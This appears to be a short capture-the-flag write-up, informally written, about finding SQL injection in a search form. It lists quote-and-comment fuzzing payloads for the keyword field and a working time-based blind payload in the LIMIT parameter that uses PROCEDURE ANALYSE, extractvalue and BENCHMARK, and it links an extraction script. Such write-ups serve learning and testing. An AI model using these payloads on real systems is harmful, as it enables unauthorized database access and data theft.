Searching and submitting the form gives a request like this: keyword=superfish&limit=2&find=Submit+Query

OK, first I tried fuzzing the keyword field for SQLi, namely:
+ keyword=superfish'--
+ keyword=superfish"--
+ keyword=superfish')--
+ keyword=superfish")--
No result came back, so I guessed this field is filtered with the function mysql_real_escape_string. Skip it.

Fuzzing limit:
+ limit=2 -- - => OK
+ limit=100 => OK
+ limit=2,1 => OK
+ limit= 2 offset 0 => OK
So the author's injection point must be here. From my experience, SQLi in LIMIT comes in two forms: one uses select case / if else, the other uses union-based SQLi, but neither worked. So off to visit Google. After a while messing around with Google it finally paid off :chaymau:

To solve this one I used time-based blind combined with PROCEDURE ANALYSE. Reference: https://rateip.com/blog/sql-injections-in-mysql-limit-clause/

OK, let's give it a shot:
keyword=superfish&limit=1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)&find=Submit+Query
Alt + X (HackBar, for anyone who doesn't know) and count on your fingers, 1->2->3->4->5
-> bingo! OK, now just blind it: <this is a quick-and-dirty Python script that only works for this challenge> http://pastebin.com/g7cv7xXd